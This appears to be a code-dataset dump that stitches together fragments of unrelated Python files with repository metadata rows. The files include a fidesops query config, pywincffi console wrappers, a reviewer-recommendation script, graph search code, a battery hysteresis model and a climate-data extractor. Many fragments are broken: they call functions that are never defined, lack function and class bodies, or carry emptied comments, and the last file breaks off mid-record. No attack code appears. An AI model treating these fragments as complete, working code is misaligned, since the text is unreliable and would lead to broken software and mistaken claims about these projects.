from sqlalchemy.sql.elements import TextClause
from fidesops.graph.config import ROOT_COLLECTION_ADDRESS, CollectionAddress
from fidesops.graph.traversal import TraversalNode, Row
from fidesops.models.policy import Policy
from fidesops.util.collection_util import append
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
T = TypeVar("T")
def query_sources(self) -> Dict[str, List[CollectionAddress]]:
"""Display the input sources for each query key"""
data: Dict[str, List[CollectionAddress]] = {}
for edge in self.node.incoming_edges():
append(data, edge.f2.field, edge.f1.collection_address())
return data
def display_query_data(self) -> Dict[str, Any]:
"""Data to represent a display (dry-run) query. Since we don't know
what data is available, just generate a query where the input identity
values are assumed to be present and singulur and all other values that
may be multiple are represented by a pair [?,?]"""
data = {}
t = QueryConfig.QueryToken()
for k, v in self.query_sources().items():
if len(v) == 1 and v[0] == ROOT_COLLECTION_ADDRESS:
data[k] = [t]
else:
data[k] = [
t,
QueryConfig.QueryToken(),
] # intentionally want a second instance so that set does not collapse into 1 value
return data
MongoStatement = Tuple[Dict[str, Any], Dict[str, Any]]
"""A mongo query is expressed in the form of 2 dicts, the first of which represents
the query object(s) and the second of which represents fields to return.
e.g. 'collection.find({k1:v1, k2:v2},{f1:1, f2:1 ... })'. This is returned as
a tuple ({k1:v1, k2:v2},{f1:1, f2:1 ... }).
An update statement takes the form
collection.update_one({k1:v1},{k2:v2}...}, {$set: {f1:fv1, f2:fv2 ... }}, upsert=False).
This is returned as a tuple
({k1:v1},{k2:v2}...}, {f1:fv1, f2: fv2 ... }
"""
| 38.655738 | 128 | 0.598473 |
3c90a121b4d915c2524981fd84ae09376497b28d | 91 | py | Python | chocopy-rs/test/pa3/simple_str.py | wwylele/chocopy-wwylele | ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa | [
"MIT"
] | 5 | 2020-05-13T03:47:43.000Z | 2022-01-20T04:52:42.000Z | chocopy-rs/test/pa3/simple_str.py | wwylele/chocopy-wwylele | ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa | [
"MIT"
] | 4 | 2020-05-18T01:06:15.000Z | 2020-06-12T19:33:14.000Z | chocopy-rs/test/pa3/simple_str.py | wwylele/chocopy-rs | ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa | [
"MIT"
] | null | null | null | print("debug_print: 42")
print("")
print("Hello")
#!
#<->#
#debug_print: 42
#
#Hello
#<->#
| 9.1 | 24 | 0.56044 |
3c92d76b2ecb583dc3d4b1217c00aa46b1e963fb | 710 | py | Python | src/catchbot/routes.py | grihabor/catch-hook-telegram-bot | 1f3c6a5d56d5ebba3d4620b532acde2ed734a75e | [
"MIT"
] | null | null | null | src/catchbot/routes.py | grihabor/catch-hook-telegram-bot | 1f3c6a5d56d5ebba3d4620b532acde2ed734a75e | [
"MIT"
] | 4 | 2018-02-21T11:25:49.000Z | 2018-06-23T15:51:51.000Z | src/catchbot/routes.py | grihabor/catch-hook-telegram-bot | 1f3c6a5d56d5ebba3d4620b532acde2ed734a75e | [
"MIT"
] | null | null | null | from flask import request, redirect
from .message import create_message_for_user
from .tasks import send_message_to_bot
| 22.903226 | 63 | 0.683099 |
3c97c75c9954f8ab840e506c7e164088d7c58e96 | 17,208 | py | Python | src/PR_recommend_algorithm.py | HyunJW/An-Algorithm-for-Peer-Reviewer-Recommendation-Based-on-Scholarly-Activity-Assessment | 6e94a7775f110bd74a71182f0d29baa91f880ac9 | [
"Apache-2.0"
] | 2 | 2020-05-25T08:20:54.000Z | 2020-05-25T08:21:02.000Z | src/PR_recommend_algorithm.py | HyunJW/An-Algorithm-for-Peer-Reviewer-Recommendation | 6e94a7775f110bd74a71182f0d29baa91f880ac9 | [
"Apache-2.0"
] | null | null | null | src/PR_recommend_algorithm.py | HyunJW/An-Algorithm-for-Peer-Reviewer-Recommendation | 6e94a7775f110bd74a71182f0d29baa91f880ac9 | [
"Apache-2.0"
] | null | null | null | #-*- coding:utf-8 -*-
#import python packages
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.metrics import adjusted_rand_score
from sklearn.metrics import silhouette_samples
from sklearn.cluster import KMeans
from sklearn.utils.testing import ignore_warnings
from sklearn.preprocessing import StandardScaler
from sklearn.datasets import *
from sklearn.cluster import *
from gensim.summarization.summarizer import summarize
from gensim.summarization import keywords
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
from operator import itemgetter
from operator import attrgetter
from pyjarowinkler import distance
from collections import Counter
from matplotlib import pyplot as plt
import pandas as pd
import numpy as np
import nltk
import math
import time
import csv
import sys
import re
import io
import os
start_time = time.time()
#
#
#
# (csv path, csv path, )
#
# (csv path, DataFrame, i , , )
#
# (_csv path, _csv path, _csv path,_DataFrame, _DataFrame, i , , __)
#csv
# (save_path, _DataFrame, _DataFrame, i , )
#
# ( path)
#
if __name__ == '__main__':
#
main() | 29.01855 | 179 | 0.609949 |
3c988a3bbfa24fe5c3273607b2e3a5909c559524 | 2,241 | py | Python | controlimcap/models/flatattn.py | SikandarBakht/asg2cap | d8a6360eaccdb8c3add5f9c4f6fd72764e47e762 | [
"MIT"
] | 169 | 2020-03-15T08:41:39.000Z | 2022-03-30T09:36:17.000Z | controlimcap/models/flatattn.py | wtr850/asg2cap | 97a1d866d4a2b86c1f474bb168518f97eb2f8b96 | [
"MIT"
] | 25 | 2020-05-23T15:14:00.000Z | 2022-03-10T06:20:31.000Z | controlimcap/models/flatattn.py | wtr850/asg2cap | 97a1d866d4a2b86c1f474bb168518f97eb2f8b96 | [
"MIT"
] | 25 | 2020-04-02T10:08:01.000Z | 2021-12-09T12:10:10.000Z | import torch
import torch.nn as nn
import framework.configbase
import caption.encoders.vanilla
import caption.decoders.attention
import caption.models.attention
import controlimcap.encoders.flat
from caption.models.attention import MPENCODER, ATTNENCODER, DECODER
| 43.096154 | 95 | 0.764391 |
3c99a84bfa19cff4eef1b2a7eb8aeb82d35b63a6 | 5,169 | py | Python | pywincffi/kernel32/console.py | opalmer/pycffiwin32 | 39210182a92e93c37a9f1c644fd5fcc1aa32f6d1 | [
"MIT"
] | 10 | 2015-11-19T12:39:50.000Z | 2021-02-21T20:15:29.000Z | pywincffi/kernel32/console.py | opalmer/pycffiwin32 | 39210182a92e93c37a9f1c644fd5fcc1aa32f6d1 | [
"MIT"
] | 109 | 2015-06-15T05:03:33.000Z | 2018-01-14T10:18:48.000Z | pywincffi/kernel32/console.py | opalmer/pycffiwin32 | 39210182a92e93c37a9f1c644fd5fcc1aa32f6d1 | [
"MIT"
] | 8 | 2015-07-29T04:18:27.000Z | 2018-11-02T17:15:40.000Z | """
Console
-------
A module containing functions for interacting with a Windows
console.
"""
from six import integer_types
from pywincffi.core import dist
from pywincffi.core.checks import NON_ZERO, NoneType, input_check, error_check
from pywincffi.exceptions import WindowsAPIError
from pywincffi.wintypes import HANDLE, SECURITY_ATTRIBUTES, wintype_to_cdata
def SetConsoleTextAttribute(hConsoleOutput, wAttributes):
"""
Sets the attributes of characters written to a console buffer.
.. seealso::
https://docs.microsoft.com/en-us/windows/console/setconsoletextattribute
:param pywincffi.wintypes.HANDLE hConsoleOutput:
A handle to the console screen buffer. The handle must have the
``GENERIC_READ`` access right.
:param int wAttributes:
The character attribute(s) to set.
"""
input_check("hConsoleOutput", hConsoleOutput, HANDLE)
input_check("wAttributes", wAttributes, integer_types)
ffi, library = dist.load()
# raise Exception(type(wAttributes))
# info = ffi.new("PCHAR_INFO")
code = library.SetConsoleTextAttribute(
wintype_to_cdata(hConsoleOutput),
ffi.cast("ATOM", wAttributes)
)
error_check("SetConsoleTextAttribute", code=code, expected=NON_ZERO)
def GetConsoleScreenBufferInfo(hConsoleOutput):
"""
Retrieves information about the specified console screen buffer.
.. seealso::
https://docs.microsoft.com/en-us/windows/console/getconsolescreenbufferinfo
:param pywincffi.wintypes.HANDLE hConsoleOutput:
A handle to the console screen buffer. The handle must have the
``GENERIC_READ`` access right.
:returns:
Returns a ffi data structure with attributes corresponding to
the fields on the ``PCONSOLE_SCREEN_BUFFER_INFO`` struct.
"""
input_check("hConsoleOutput", hConsoleOutput, HANDLE)
ffi, library = dist.load()
info = ffi.new("PCONSOLE_SCREEN_BUFFER_INFO")
code = library.GetConsoleScreenBufferInfo(
wintype_to_cdata(hConsoleOutput), info)
error_check("GetConsoleScreenBufferInfo", code, expected=NON_ZERO)
return info
def CreateConsoleScreenBuffer(
dwDesiredAccess, dwShareMode, lpSecurityAttributes=None, dwFlags=None):
"""
Creates a console screen buffer.
.. seealso::
https://docs.microsoft.com/en-us/windows/console/createconsolescreenbuffer
:type dwDesiredAccess: int or None
:param dwDesiredAccess:
The access to the console screen buffer. If `None` is provided
then the Windows APIs will use a default security descriptor.
:type dwShareMode: int or None
:param dwShareMode:
Controls the options for sharing the resulting handle. If `None` or
0 then the resulting buffer cannot be shared.
:keyword pywincffi.wintypes.SECURITY_ATTRIBUTES lpSecurityAttributes:
Extra security attributes that determine if the resulting handle
can be inherited. If `None` is provided, which is the default, then
the handle cannot be inherited.
:keyword int dwFlags:
The type of console buffer to create. The flag is superficial because
it only accepts None or ``CONSOLE_TEXTMODE_BUFFER`` as inputs. If no
value is provided, which is the default, then
``CONSOLE_TEXTMODE_BUFFER`` is automatically used.
:rtype: :class:`pywincffi.wintypes.HANDLE``
:returns:
Returns the handle created by the underlying C function.
:func:`pywincffi.kernel32.CloseHandle` should be called on the handle
when you are done with it.
"""
ffi, library = dist.load()
if dwDesiredAccess is None:
dwDesiredAccess = ffi.NULL
if dwShareMode is None:
dwShareMode = 0
if dwFlags is None:
dwFlags = library.CONSOLE_TEXTMODE_BUFFER
input_check(
"dwDesiredAccess", dwDesiredAccess, allowed_values=(
ffi.NULL,
library.GENERIC_READ,
library.GENERIC_WRITE,
library.GENERIC_READ | library.GENERIC_WRITE
))
input_check(
"dwShareMode", dwShareMode, allowed_values=(
0,
library.FILE_SHARE_READ,
library.FILE_SHARE_WRITE,
library.FILE_SHARE_READ | library.FILE_SHARE_WRITE,
))
input_check(
"dwFlags", dwFlags,
allowed_values=(
library.CONSOLE_TEXTMODE_BUFFER,
))
input_check(
"lpSecurityAttributes", lpSecurityAttributes,
allowed_types=(NoneType, SECURITY_ATTRIBUTES))
if lpSecurityAttributes is None:
lpSecurityAttributes = ffi.NULL
handle = library.CreateConsoleScreenBuffer(
ffi.cast("DWORD", dwDesiredAccess),
ffi.cast("DWORD", dwShareMode),
lpSecurityAttributes,
ffi.cast("DWORD", dwFlags),
ffi.NULL # _reserved_
)
if handle == library.INVALID_HANDLE_VALUE: # pragma: no cover
raise WindowsAPIError(
"CreateConsoleScreenBuffer", "Invalid Handle",
library.INVALID_HANDLE_VALUE,
expected_return_code="not INVALID_HANDLE_VALUE")
return HANDLE(handle)
| 32.923567 | 83 | 0.691623 |
3c9a8ed33f779646dc17846360f63018c12812e8 | 2,568 | py | Python | src/extractClimateObservations.py | bcgov/nr-rfc-ensweather | 5d1ce776e6eeb35a5672ca194e3c2ced1be98ed6 | [
"Apache-2.0"
] | 1 | 2021-03-23T15:32:39.000Z | 2021-03-23T15:32:39.000Z | src/extractClimateObservations.py | bcgov/nr-rfc-ensweather | 5d1ce776e6eeb35a5672ca194e3c2ced1be98ed6 | [
"Apache-2.0"
] | 7 | 2021-02-05T00:52:08.000Z | 2022-03-01T21:37:43.000Z | src/extractClimateObservations.py | bcgov/nr-rfc-ensweather | 5d1ce776e6eeb35a5672ca194e3c2ced1be98ed6 | [
"Apache-2.0"
] | 2 | 2021-02-24T20:29:39.000Z | 2021-03-23T15:32:44.000Z | """
extracts the climate observation data from the xlsx spreadsheet to a csv file
so that ens weather scripts can consume it.
Looks in the folder os.environ["ENS_CLIMATE_OBS"]
determines the relationship between the xlsx source and the csv destinations
deleteds any csv's and regenerates them by exporting the ALL_DATa sheet
from the corresponding xlsx file
"""
import csv
import glob
import logging.config
import openpyxl
import os
import pandas as pd
import config.logging_config
logging.config.dictConfig(config.logging_config.LOGGING_CONFIG)
LOGGER = logging.getLogger(__name__)
excelFileDir = os.environ["ENS_CLIMATE_OBS"]
excelFileGlobPattern = "ClimateDataOBS_*.xlsx"
csvFileNamePattern = "climate_obs_{year}.csv"
sheetName = 'ALL_DATA'
def convertCsvPandas(excelFile, csvFileFullPath):
"""
Doesn't work for some reason
"""
data_xls = pd.read_excel(excelFile, sheet_name="ALL_DATA")
data_xls.to_csv(csvFileFullPath, encoding="utf-8", index=False, header=True)
if __name__ == "__main__":
globDir = os.path.join(excelFileDir, excelFileGlobPattern)
LOGGER.debug(f"glob pattern: {excelFileGlobPattern}")
excelClimateObservationFiles = glob.glob(globDir)
for excelFile in excelClimateObservationFiles:
LOGGER.info(f"input excelFile: {excelFile}")
# extract the year from the filename
excelFileBasename = os.path.basename(excelFile)
year = os.path.splitext(excelFileBasename)[0].split("_")[1]
LOGGER.debug(f"year from excel file parse: {year}")
csvFileName = csvFileNamePattern.format(year=year)
LOGGER.info(f"output csv file: {csvFileName}")
csvFileFullPath = os.path.join(excelFileDir, csvFileName)
if os.path.exists(csvFileFullPath):
LOGGER.info(f"deleting the csv file: {csvFileFullPath}")
os.remove(csvFileFullPath)
LOGGER.info(f"dumping the sheet: {sheetName} from the file {excelFile} to {csvFileFullPath}")
convertCsvXlrd(excelFile, sheetName, csvFileFullPath)
| 35.178082 | 101 | 0.712227 |
3c9b6cb2f965c39ce2408034c9338f67c659fa02 | 403 | py | Python | Python/Basic Data Types/finding-the-percentage.py | mateusnr/hackerrank-solutions | 2fa60bae480d8afb46e3d99929707a7d9d92858f | [
"CC0-1.0"
] | 1 | 2015-08-01T04:03:47.000Z | 2015-08-01T04:03:47.000Z | Python/Basic Data Types/finding-the-percentage.py | mateusnr/hackerrank-solutions | 2fa60bae480d8afb46e3d99929707a7d9d92858f | [
"CC0-1.0"
] | null | null | null | Python/Basic Data Types/finding-the-percentage.py | mateusnr/hackerrank-solutions | 2fa60bae480d8afb46e3d99929707a7d9d92858f | [
"CC0-1.0"
] | 4 | 2020-05-04T15:12:21.000Z | 2021-02-18T11:58:30.000Z | n = int(input()) # takes the number of arguments
mdict = {}
for i in range(0,n):
grades = input().split(" ") # self explanatory
scores = list(map(float, grades[1:])) # since the first element from the list grades is the name of the student
mdict[grades[0]] = sum(scores)/float(len(scores)) # the key is the name of the student and the value is the average
print("%.2f" % mdict[input()]) | 50.375 | 120 | 0.665012 |
3c9c7350a4efa3be4f373180a4fc5ceaa1d748e4 | 2,764 | py | Python | src/6_ZigZagConversion.py | chenbin11200/AlgorithmInPython | 222780f14afdafc4c7d0047b6f1477bd0b0ecf0f | [
"MIT"
] | null | null | null | src/6_ZigZagConversion.py | chenbin11200/AlgorithmInPython | 222780f14afdafc4c7d0047b6f1477bd0b0ecf0f | [
"MIT"
] | null | null | null | src/6_ZigZagConversion.py | chenbin11200/AlgorithmInPython | 222780f14afdafc4c7d0047b6f1477bd0b0ecf0f | [
"MIT"
] | null | null | null |
# This is NOT zigzag conversion, instead it is
# 1 5 9
# 2 4 6 8 .
# 3 7 .
print BestSolution().convert('abc', 2) | 27.098039 | 79 | 0.45152 |
3c9d412ce7e720587944a183ef63dc8c3a37cb1a | 2,437 | py | Python | server/server/parsing/session.py | PixelogicDev/zoom_attendance_check | 7c47066d006ae2205ccb04371115904ec48e3bda | [
"MIT"
] | 1 | 2020-12-30T19:39:56.000Z | 2020-12-30T19:39:56.000Z | server/server/parsing/session.py | PixelogicDev/zoom_attendance_check | 7c47066d006ae2205ccb04371115904ec48e3bda | [
"MIT"
] | null | null | null | server/server/parsing/session.py | PixelogicDev/zoom_attendance_check | 7c47066d006ae2205ccb04371115904ec48e3bda | [
"MIT"
] | null | null | null | import pandas as pd | 55.386364 | 137 | 0.684858 |
3c9f1d64c05ce80fd3ad121b31d428afa01b9e36 | 4,538 | py | Python | project/image.py | Mandrenkov/SVBRDF-Texture-Synthesis | 7e7282698befd53383cbd6566039340babb0a289 | [
"MIT"
] | 2 | 2021-04-26T14:41:11.000Z | 2021-08-20T09:13:03.000Z | project/image.py | Mandrenkov/SVBRDF-Texture-Synthesis | 7e7282698befd53383cbd6566039340babb0a289 | [
"MIT"
] | null | null | null | project/image.py | Mandrenkov/SVBRDF-Texture-Synthesis | 7e7282698befd53383cbd6566039340babb0a289 | [
"MIT"
] | null | null | null | import imageio # type: ignore
import logging
import numpy # type: ignore
import os
import pathlib
import torch
import torchvision # type: ignore
import utils
from torch import Tensor
from typing import Callable
def load(path: str, encoding: str = 'RGB') -> Tensor:
'''
Loads the image at the given path using the supplied encoding.
Args:
path: Path to the image.
encoding: Encoding of the image.
Returns:
Tensor [R, C, X] representing the normalized pixel values in the image.
'''
assert path, "Path cannot be empty or set to None."
array = imageio.imread(path)
device = utils.get_device_name()
image = torchvision.transforms.ToTensor()(array).to(device).permute(1, 2, 0)[:, :, :3]
if encoding == 'sRGB':
image = convert_sRGB_to_RGB(image)
elif encoding == 'Greyscale':
image = convert_RGB_to_greyscale(image)
elif encoding != 'RGB':
raise Exception(f'Image encoding "{encoding}" is not supported."')
logging.debug('Loaded image from "%s"', path)
return image
def save(path: str, image: Tensor, encoding: str = 'RGB') -> None:
'''
Saves the given image to the specified path using the supplied encoding.
Args:
path: Path to the image.
image: Tensor [R, C, X] of normalized pixel values in the image.
encoding: Encoding of the image.
'''
assert path, "Path cannot be empty or set to None."
assert torch.all(0 <= image) and torch.all(image <= 1), "Image values must fall in the closed range [0, 1]."
if encoding == 'sRGB':
image = convert_RGB_to_sRGB(image)
elif encoding == 'Greyscale':
image = convert_greyscale_to_RGB(image)
elif encoding != 'RGB':
raise Exception(f'Image encoding "{encoding}" is not supported."')
pathlib.Path(os.path.dirname(path)).mkdir(parents=True, exist_ok=True)
imageio.imwrite(path, torch.floor(255 * image).detach().cpu().numpy().astype(numpy.uint8))
logging.debug('Saved image to "%s"', path)
def clamp(function: Callable[[Tensor], Tensor]) -> Callable:
'''
Decorator which clamps an image destined for the given function to the range [, 1]. Note that is used in favour
of 0 to enable differentiation through fractional exponents.
Args:
function: Function that accepts an image Tensor as input.
Returns:
Wrapper which implements the aforementioned behaviour.
'''
return lambda image: function(image.clamp(1E-8, 1))
def convert_RGB_to_greyscale(image: Tensor) -> Tensor:
'''
Converts a linear RGB image into a greyscale image.
Args:
image: Tensor [R, C, 3] of an RGB image.
Returns:
Tensor [R, C, 1] of a greyscale image.
'''
assert len(image.shape) == 3 and (image.size(2) == 1 or image.size(2) == 3), 'RGB image must have dimensionality [R, C, 1] or [R, C, 3].'
if image.size(2) == 3:
assert torch.all((image[:, :, 0] == image[:, :, 1]) & (image[:, :, 0] == image[:, :, 2])), 'RGB image must have the same value across each colour channel.'
return image[:, :, [0]]
return image
def convert_greyscale_to_RGB(image: Tensor) -> Tensor:
'''
Converts a greyscale image into a linear RGB image.
Args:
image: Tensor [R, C, 1] of a greyscale image.
Returns:
Tensor [R, C, 3] of a linear RGB image.
'''
assert len(image.shape) == 3 and image.size(2) == 1, 'Greyscale image must have dimensionality [R, C, 1].'
return image.expand(-1, -1, 3)
| 32.884058 | 163 | 0.628691 |
b1af4bb14846eb251b39a1c7a18e1ee46ffce810 | 12,611 | py | Python | node_graph.py | JasonZhuGit/py_path_planner | e045a076c2c69284f1f977420ad93a966161e012 | [
"Apache-2.0"
] | null | null | null | node_graph.py | JasonZhuGit/py_path_planner | e045a076c2c69284f1f977420ad93a966161e012 | [
"Apache-2.0"
] | null | null | null | node_graph.py | JasonZhuGit/py_path_planner | e045a076c2c69284f1f977420ad93a966161e012 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import matplotlib.pyplot as plt
import numpy as np
from vertex import Vertex
from heap import PriorityQueue
def BFS_reset_vertices(self):
for v in self.vertices.values():
v.reset()
v.dist = float("inf")
class MNodeGraph(NodeGraph): #save as matrix
if __name__ == "__main__":
vertices = [['S', 'A', 'B', 'C'],
['A', 'S', 'D', 'E'],
['B', 'S', 'E', 'F'],
['C', 'S', 'K'],
['D', 'A', 'G'],
['E', 'A', 'B', 'G'],
['F', 'B', 'K', 'G'],
['K', 'C', 'F', 'G'],
['G', 'D', 'E', 'F', 'K']]
positions = {"S":[0.05, 0.5], #0
"A":[0.3, 0.8], #1
"B":[0.3, 0.5], #2
"C":[0.3, 0.2], #3
"D":[0.6, 0.95], #4
"E":[0.6, 0.65], #5
"F":[0.6, 0.4], #6
"K":[0.8, 0.2], #7
"G":[0.99, 0.5],} #8
weights = { ('S', 'A'): 9, ('S', 'B'): 6, ('S', 'C'): 8, ('A', 'S'): 9, ('B', 'S'): 6, ('C', 'S'): 8,
('A', 'D'): 7, ('A', 'E'): 9, ('D', 'A'): 7, ('E', 'A'): 9,
('B', 'E'): 8, ('B', 'F'): 8, ('E', 'B'): 8, ('F', 'B'): 8,
('C', 'K'): 20, ('K', 'C'): 20,
('D', 'G'): 16, ('G', 'D'): 16,
('E', 'G'): 13, ('G', 'E'): 13,
('F', 'G'): 13, ('F', 'K'): 5, ('G', 'F'): 13, ('K', 'F'): 5,
('K', 'G'): 6, ('G', 'K'): 6 }
heuristic = { "S": 20, #0
"A": 15, #1
"B": 17, #2
"C": 15, #3
"D": 11, #4
"E": 12, #5
"F": 10, #6
"K": 5, #7
"G": 0,} #8
lgraph = LNodeGraph(vertices, positions, weights, heuristic)
lgraph.BFS('S')
lgraph.draw_init()
lgraph.draw_vertices(heuristic=True)
lgraph.draw_edges(weight=True)
# lgraph.draw_BFS_tree()
# lgraph.DFS()
# lgraph.draw_DFS_forest()
# lgraph.Dijkstra('S')
# lgraph.draw_Dijkstra_tree()
lgraph.AStar('S', 'G')
lgraph.draw_A_star_path('S', 'G')
lgraph.show()
| 35.624294 | 135 | 0.505273 |
b1b2da34505536ccd8a8d170d37deaec68c901e7 | 1,534 | py | Python | Y2018/Day09.py | dnsdhrj/advent-of-code-haskell | 160257960c7995f3e54f889b3d893894bc898005 | [
"BSD-3-Clause"
] | 7 | 2020-11-28T10:29:45.000Z | 2022-02-03T07:37:54.000Z | Y2018/Day09.py | sonowz/advent-of-code-haskell | 160257960c7995f3e54f889b3d893894bc898005 | [
"BSD-3-Clause"
] | null | null | null | Y2018/Day09.py | sonowz/advent-of-code-haskell | 160257960c7995f3e54f889b3d893894bc898005 | [
"BSD-3-Clause"
] | null | null | null | import re
with open('09.txt') as f:
line = f.read()
[n_player, turn] = [int(x) for x in re.search(r'(\d+)[^\d]*(\d+).*$', line).groups()]
print(solve1(n_player, turn))
print(solve2(n_player, turn))
| 23.96875 | 89 | 0.541069 |
b1b3c90a89f10cc3abca5ea3c241070e29f4d3b5 | 628 | py | Python | examples/consulta_preco.py | deibsoncarvalho/tabela-fipe-api | 2890162e4436611326f0b878f647f344a8d52626 | [
"Apache-2.0"
] | null | null | null | examples/consulta_preco.py | deibsoncarvalho/tabela-fipe-api | 2890162e4436611326f0b878f647f344a8d52626 | [
"Apache-2.0"
] | null | null | null | examples/consulta_preco.py | deibsoncarvalho/tabela-fipe-api | 2890162e4436611326f0b878f647f344a8d52626 | [
"Apache-2.0"
] | null | null | null | from fipeapi import CARRO, CAMINHAO, MOTO, consulta_preco_veiculo, pega_anos_modelo, pega_modelos
from time import sleep
if __name__ == '__main__':
consulta_preco()
| 36.941176 | 97 | 0.705414 |
b1b43acb4fa91071f5f63c2486fa86ca051d0487 | 247 | py | Python | servo/views/tags.py | ipwnosx/Servo | 3418ece690ca90d676a7d8ae654da7770ae312fb | [
"BSD-2-Clause"
] | null | null | null | servo/views/tags.py | ipwnosx/Servo | 3418ece690ca90d676a7d8ae654da7770ae312fb | [
"BSD-2-Clause"
] | null | null | null | servo/views/tags.py | ipwnosx/Servo | 3418ece690ca90d676a7d8ae654da7770ae312fb | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from django.http import HttpResponse
from servo.models import TaggedItem
| 17.642857 | 42 | 0.696356 |
b1b47b065e5504e7082a3670697994dcf84ff418 | 853 | py | Python | isubscribe/management/commands/announce.py | ilavender/sensu_drive | e874024aa157c7076ccc9465e9d6ae00a4f19fd0 | [
"MIT"
] | 71 | 2016-12-25T12:06:07.000Z | 2021-02-21T21:14:48.000Z | isubscribe/management/commands/announce.py | ilavender/sensu_drive | e874024aa157c7076ccc9465e9d6ae00a4f19fd0 | [
"MIT"
] | 7 | 2016-12-23T23:18:45.000Z | 2021-06-10T18:58:14.000Z | isubscribe/management/commands/announce.py | ilavender/sensu_drive | e874024aa157c7076ccc9465e9d6ae00a4f19fd0 | [
"MIT"
] | 30 | 2017-01-01T16:18:19.000Z | 2021-04-21T15:06:47.000Z | from django.core.management.base import BaseCommand, CommandError
from channels import Channel, Group, channel_layers
import json
from builtins import str
| 27.516129 | 74 | 0.52755 |
b1b9101a00a5671a8a714dcff7906632b6da9851 | 849 | py | Python | jcms/models/generic_menu_item.py | jessielaf/jcms-pip | ba0580c7cf229b099c17f0286d148018dabf8aa8 | [
"MIT"
] | null | null | null | jcms/models/generic_menu_item.py | jessielaf/jcms-pip | ba0580c7cf229b099c17f0286d148018dabf8aa8 | [
"MIT"
] | null | null | null | jcms/models/generic_menu_item.py | jessielaf/jcms-pip | ba0580c7cf229b099c17f0286d148018dabf8aa8 | [
"MIT"
] | null | null | null | from typing import List
from django.template.defaultfilters import slugify
from jcms.models.single_menu_item import SingleMenuItem
| 30.321429 | 95 | 0.657244 |
b1ba9b4717e2cdd9d9bb6e7e1745006030876674 | 9,572 | py | Python | SOC_Photon/Battery State/EKF/sandbox/Hysteresis.py | davegutz/myStateOfCharge | d03dc5e92a9561d4b28be271d4eabe40b48b32ce | [
"MIT"
] | 1 | 2021-12-03T08:56:33.000Z | 2021-12-03T08:56:33.000Z | SOC_Photon/Battery State/EKF/sandbox/Hysteresis.py | davegutz/myStateOfCharge | d03dc5e92a9561d4b28be271d4eabe40b48b32ce | [
"MIT"
] | null | null | null | SOC_Photon/Battery State/EKF/sandbox/Hysteresis.py | davegutz/myStateOfCharge | d03dc5e92a9561d4b28be271d4eabe40b48b32ce | [
"MIT"
] | null | null | null | # Hysteresis class to model battery charging / discharge hysteresis
# Copyright (C) 2022 Dave Gutz
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation;
# version 2.1 of the License.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# See http://www.fsf.org/licensing/licenses/lgpl.txt for full license text.
__author__ = 'Dave Gutz <davegutz@alum.mit.edu>'
__version__ = '$Revision: 1.1 $'
__date__ = '$Date: 2022/01/08 13:15:02 $'
import numpy as np
from pyDAGx.lookup_table import LookupTable
if __name__ == '__main__':
import sys
import doctest
from datetime import datetime
from unite_pictures import unite_pictures_into_pdf
import os
doctest.testmod(sys.modules['__main__'])
import matplotlib.pyplot as plt
main()
| 35.191176 | 120 | 0.531446 |
b1bbb7e85fba153d58638741ce35332ddf59f2bb | 127 | py | Python | blog/home/urls.py | 11059/blog | bd3a68b4a032c24da5831aefd33f358284ca4c3d | [
"MIT"
] | null | null | null | blog/home/urls.py | 11059/blog | bd3a68b4a032c24da5831aefd33f358284ca4c3d | [
"MIT"
] | null | null | null | blog/home/urls.py | 11059/blog | bd3a68b4a032c24da5831aefd33f358284ca4c3d | [
"MIT"
] | null | null | null | from django.urls import path
from home.views import IndexView
urlpatterns=[
path('', IndexView.as_view(),name='index'),
] | 18.142857 | 47 | 0.724409 |
b1bbf9e9296a7bbda869b9c7e588aab147399325 | 1,507 | py | Python | groundstation/proto/object_list_pb2.py | richo/groundstation | 7ed48dd355051ee6b71164fc801e3893c09d11db | [
"MIT"
] | 26 | 2015-06-18T20:17:07.000Z | 2019-09-26T09:55:35.000Z | groundstation/proto/object_list_pb2.py | richo/groundstation | 7ed48dd355051ee6b71164fc801e3893c09d11db | [
"MIT"
] | null | null | null | groundstation/proto/object_list_pb2.py | richo/groundstation | 7ed48dd355051ee6b71164fc801e3893c09d11db | [
"MIT"
] | 5 | 2015-07-20T01:52:47.000Z | 2017-01-08T09:54:07.000Z | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: groundstation/proto/object_list.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
DESCRIPTOR = _descriptor.FileDescriptor(
name='groundstation/proto/object_list.proto',
package='',
serialized_pb='\n%groundstation/proto/object_list.proto\" \n\nObjectList\x12\x12\n\nobjectname\x18\x01 \x03(\t')
_OBJECTLIST = _descriptor.Descriptor(
name='ObjectList',
full_name='ObjectList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='objectname', full_name='ObjectList.objectname', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=41,
serialized_end=73,
)
DESCRIPTOR.message_types_by_name['ObjectList'] = _OBJECTLIST
# @@protoc_insertion_point(module_scope)
| 25.982759 | 114 | 0.760451 |
b1bc9799f169be42f1deb800510f1f294b2fb871 | 3,822 | py | Python | src/google.com/get_website.py | IRE-Project/Data-Collector | 9ca3efc32afe068682d334c8f833cb97ff2af36d | [
"MIT"
] | null | null | null | src/google.com/get_website.py | IRE-Project/Data-Collector | 9ca3efc32afe068682d334c8f833cb97ff2af36d | [
"MIT"
